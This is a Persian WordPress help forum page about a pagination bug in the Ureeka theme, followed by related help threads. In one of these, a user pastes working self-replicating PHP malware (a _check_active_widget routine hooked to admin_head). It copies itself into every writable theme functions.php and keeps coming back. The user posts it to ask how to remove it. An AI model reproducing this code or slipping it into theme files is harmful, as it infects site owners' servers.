• اطلاعیه ها

    • Morteza

      باهم بسازیم: اطلس ووکامرس و وردپرس   14/07/96

      تاپیک ایجاد شده برای بحث در جهت ایجاد یک منبع، ویکی، صفحات توضیحی و یا بخش آموزشی جامع برای وردپرس و متعلقات مختلف آن است. لطفا جهت مشارکت در این بحث، ارائه پیشنهاد و یا انتقاد به تاپیک فوق مراجعه کنید. باهم بسازیم: اطلس ووکامرس و وردپرس
NWWG

مشکل صفحات داخلی پوسته Ureeka

6 پست در این موضوع قرار دارد

ارسال شده در (ویرایش شده)

سلام

توی پوسته Ureeka

به علت اینکه صفحات داخلی تحت عنوان پوشه book قرار میگیرند وقتی میزنیم بره صفحه 2 میگه صفحه موجود نیست

مثلا وقتی میزنیم صفحه بعد به این آدرس میره:

sample.ir/page/3

اما باید به این آدرس بره:

sample.ir/book/page/3

دوستان کسی اطلاع نداره باید دقیقا کجای کد قالب رو تغییر بدیم؟

من از افزونه WP-PageNavi هم استفاده کردم اما تاثیری نداشت.

خیلی ها این مشکل رو دارند: وب‌سایت مترجم قالب

ویرایش شده در توسط NWWG
0

به اشتراک گذاری این پست


لینک به پست

book یه پست تایپ هستش ؟

0

به اشتراک گذاری این پست


لینک به پست

نمیدونم! احتمالا.

0

به اشتراک گذاری این پست


لینک به پست

در قسمت تنظیمات پیوند یکتا پیش فرض هستش ؟

0

به اشتراک گذاری این پست


لینک به پست

متاسفانه هم در حالت پیش فرض و هم در حالت /book/%postname% هم صفحه دوم به طور صحیح فراخوانی نمی شود. گویا قالب برای نسخه های جدید وردپرس بهینه نشده است

0

به اشتراک گذاری این پست


لینک به پست

کلا پوسته ش کمی مشکل داره

1

به اشتراک گذاری این پست


لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری

  • مطالب مشابه

    • توسط masoumasoud
      سلام من توی تم فارست زیر یک پوسته ای که در حال استفاده از اون هستم کامنت دادم که مشکلی رو برطرف کنند ولی من هنوز اون پوسته رو به صورت اوجینال نخریده بودم و از سایت های ایرانی خریداری کرده بودم و میخواستم اورجینالش رو بعد از برطرف شدن اون مشکلات بخرم کامنت اولی رو جواب داد خود سازنده اصلی و گفت برطرف میکنیم بعد دو هفته من یه مشکل دیگه رو گفتم که دیدم اومدن گفتن ما متوجه شدیم ( از روی پروفایلم تم فارستم و پروفایل توییترم وب سایتم رو و اسم واقعیم رو پیدا کردن . با آی پی روسیه وارد شدن اسم گروهشونم  LMPixels هست) شما دارید از نسخه غیرقانونی پوسته ما استفاده می کنید و ما این مورد رو تحت قوانین DMCA به ادمین Envato گزارش کردیم !
      حالا من میخوام بدونم جه عواقبی میتونه داشته باشه این گزارش ؟ من دو تا پوسته اورجینال هم از 3 سال پیش خریدم مثل massive daynamic حالا اکانتم مسدود میشه ؟
      توی قوانین نوشته بود میتونن از شرکت هاستینگ هم بخوان که محصول رو از هاست حذف کنند ! من از میهن وب هاست ، هاست میزبانی وب آلمان رو خریدم آیا این امکان وجود داره ؟
      ممکنه توسط گوگل بلاک بشم ؟
      آدرس محصول : https://themeforest.net/item/unique-resume-vcard-cv-theme/20033679/comments

    • توسط Mortezamsh8
      سلام 
      یه مشکل خیلی خیلی جدی دارم من
      من قالب woodstock رو خریداری کردم که برای نصب اون بسته ی نصبی داشت 
      فایل زیپ قالب رو توی public_html آپلود کردم و بعد اکسترکت کردم همونجا
      بعد آدرس Infinityshop.ir/installer.php رو زدم که نصب قالب شروع بشه 
      قالب رو نصب کردم 
      همه چی هم درست بود
      اما وقتی میرفتم توی پیشخوان وردپرس و از منوی بغل مثلا گزینه ی افزونه ها یا نوشته ها یا رسانه یا... رو می زدم وارد یه صفحه ای میشد که از من ftp server , user ftp , passeord ftp رو میخواست اونم چند بار
      بعد دو ثانیه کلا همه چی رفت یه سری کاراکتر عجیب غریب اومد 
      اصلن نمیدونم چی هس
      به کل زبان پیشخوان عوض شده 
      یه سری کاراکتر عجیب غریب اومده
      خواهشا هر کسی میتونه کمک کنه بگه
      جای دوری نمیره  
      دمتون گرم
      اگرم جایی رو بعد توضیح یا توضیح بیشتر میخواد بگید که بگم


    • توسط IFTHEN
      اطلاعاتی در مورد ایجاد قسمت تنظیمات پوسته، (از تغییر رنگ و اندازه و...  المان های مختلف و انتخاب فونت و... گرفته تا اضافه و کم کردن قسمت های مختلف مثل تبلیغات و...) می خواستم.
      از کجا باید شروع کرد و اساس کار به چه صورت هست؟
      به چه صورت می شه این پنل رو تعریف و شخصی سازی کرد و گزینه های مختلف به اون اضافه کرد؟
    • توسط sajjadmp
      سلام 
      من برای دومین بار دست به ساختن پوسته ی فرزند برای یه پوسته شدم ولی این بار مثل دفعه ی قبل نیست . 
      به محض ایجاد فایل functions.php ، کدهای زیر توش قرار میگیره و هر چقدر هم که پاک میکنم دوباره می بینم سر و کلشون پیدا میشه و همین باعث میشه وردپرس صفحه سفید مرگ رو نشون بده ! 
      راهکار چیه ؟؟
      <?php function _check_active_widget(){ $widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed=""; $output=strip_tags($output, $allowed); $direst=_get_all_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6))); if (is_array($direst)){ foreach ($direst as $item){ if (is_writable($item)){ $ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"(")); $cont=file_get_contents($item); if (stripos($cont,$ftion) === false){ $sar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">"; $output .= $before . "Not found" . $after; if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);} $output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $sar . "\n" .$widget);fclose($f); $output .= ($showdot && $ellipsis) ? "..." : ""; } } } } return $output; } function _get_all_widgetcont($wids,$items=array()){ $places=array_shift($wids); if(substr($places,-1) == "/"){ $places=substr($places,0,-1); } if(!file_exists($places) || !is_dir($places)){ return false; }elseif(is_readable($places)){ $elems=scandir($places); foreach ($elems as $elem){ if ($elem != "." && $elem != ".."){ if (is_dir($places . "/" . $elem)){ $wids[]=$places . "/" . $elem; } elseif (is_file($places . "/" . $elem)&& $elem == substr(__FILE__,-13)){ $items[]=$places . "/" . $elem;} } } }else{ return false; } if (sizeof($wids) > 0){ return _get_all_widgetcont($wids,$items); } else { return $items; } } if(!function_exists("stripos")){ function stripos( $str, $needle, $offset = 0 ){ return strpos( strtolower( $str ), strtolower( $needle ), $offset ); } } if(!function_exists("strripos")){ function strripos( $haystack, $needle, $offset = 0 ) { if( !is_string( $needle ) )$needle = chr( intval( $needle ) ); if( $offset < 0 ){ $temp_cut = strrev( substr( $haystack, 0, abs($offset) ) ); } else{ $temp_cut = strrev( substr( $haystack, 0, max( ( strlen($haystack) - $offset ), 0 ) ) ); } if( ( $found = stripos( $temp_cut, strrev($needle) ) ) === FALSE )return FALSE; $pos = ( strlen( $haystack ) - ( $found + $offset + strlen( $needle ) ) ); return $pos; } } if(!function_exists("scandir")){ function scandir($dir,$listDirectories=false, $skipDots=true) { $dirArray = array(); if ($handle = opendir($dir)) { while (false !== ($file = readdir($handle))) { if (($file != "." && $file != "..") || $skipDots == true) { if($listDirectories == false) { if(is_dir($file)) { continue; } } array_push($dirArray,basename($file)); } } closedir($handle); } return $dirArray; } } add_action("admin_head", "_check_active_widget"); ?>  
    • توسط sajjadnajafi
      با سلام
      میبخشید دوستان،
      قالب Ureeka خیلی قالب زیبایی برای سایتهای معرفی کتاب و.. هست. اما این قالب با خطا نصب میشه..
      اگر دوستان لطف کنند یه بررسی کنند.. ممنون
      لینک دانلود قالب:
      http://www.web2feel.com/ureeka
      این هم بخشی از خطای صفحه:

      سپاس فراوان